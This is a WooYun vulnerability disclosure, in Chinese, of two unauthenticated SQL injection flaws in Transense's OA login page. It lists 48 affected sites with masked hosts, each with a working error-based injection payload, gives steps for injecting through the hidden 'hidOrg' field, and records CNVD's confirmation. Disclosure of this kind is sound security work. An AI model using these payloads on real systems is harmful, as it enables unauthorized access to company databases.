当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148083

漏洞标题:全程OA办公系统无需登录两处注入漏洞影响众多企业

相关厂商:Transense

漏洞作者: 路人甲

提交时间:2015-10-20 16:58

修复时间:2016-01-21 11:50

公开时间:2016-01-21 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

无需登录,如果要登录,那就没有任何意义~~
危害性很大,用户量很多,首页走起

详细说明:

官方案例巨多;涉及各个行业:

http://**.**.**.**/Case/Default.aspx


01.jpg


02.jpg


03.jpg


04.jpg


等等.....
SQL注入点:

第一处:/login.aspx?test=TestSystem&password=24om&oid=1&uid=   这里的oid参数存在显错模式注入
第二处:登录框的机构选项中“hidOrg”参数存在报错模式注入
<input name="hidOrg" type="hidden" id="hidOrg" value="2">


这种OA系统的关键字太特么难找了。我就只能列举一部分了:

mask 区域
*****方de*****
1.http://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^企业发^*****
2.http://**.**.**/c6//login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^^*****
3.http://**.**.**/wfb/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****产管理^*****
4.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^^*****
5.://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2&uid= _
**********
*****理集团^*****
6.://**.**.**/ehr/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^旅游^*****
7.://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2/**/aND-/**/1=char(@@version)/**/%20--%20 &uid= _
**********
*****联科技^*****
8.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****教育^*****
9.http://**.**.**/gesanghua/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^^*****
10.http://**.**.**/lianfazhubao/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^股份^*****
11.http://**.**.**/jurassic/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****营销^*****
12.http://**.**.**/000000/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****乐茶饮^*****
**********
13.http://**.**.**/gulixing2010/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^服务^*****
14.http://**.**.**/cdjxnom/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^技发^*****
15.http://**.**.**/klzx/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****技开发^*****
16.http://**.**.**/szswzn/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^集团)^*****
17.http://**.**.**/shyzjpm/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^限责^*****
18.http://**.**.**/jnuo2020/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****技有^*****
19.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^术有^*****
20.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^^*****
21.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^团有^*****
22.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****发中心^*****
23.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^管理^*****
24.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^外部设^*****
25.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^江门)^*****
26.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^理有^*****
27.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****贸有^*****
28.http://**.**.**/siekom/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****理咨询^*****
29.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^信息服^*****
30.http://**.**.**/HR/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^业园^*****
31.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^技有^*****
32.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^术有^*****
33.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--_
**********
*****^^物资^*****
34.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--_
**********
*****^^术有^*****
35.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^^地产开^*****
36.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^研^*****
37.http://**.**.**/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0-- _
**********
*****^官^*****
38.http://**.**.**/om/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
**********
*****息咨询^*****
39.http://**.**.**/oa/login.aspx _
**********
*****^技开发^*****
40.http://**.**.**/sssw/login.aspx_
**********
*****^^管理^*****
41.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^术有^*****
42.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^^*****
43.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^^易有^*****
44.http://**.**.**/itianhuang/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****)MIS^*****
45.http://**.**.**/OA/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****^网^*****
46.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****械设备^*****
47.http://**.**.**/oa/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid= _
**********
*****筑有^*****
48.http://**.**.**/ahlf/login.aspxtest=TestSystem&password=24om&oid=2%20and%20@@version%3E0--&uid=


漏洞证明:

第一处:
手工结果:

05.jpg


sqlmap结果:

06.jpg


07.jpg


第二处注入:
登录页面,审查机构的元素;<input name="hidOrg" type="hidden" id="hidOrg" value="2"> 找到这行,将value="2" 改成 value="2 and user>0--" 就可以直接爆出user了。sqlmap就需要抓表单来进行跑了~

01.jpg


02.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-23 11:40

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其电话通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无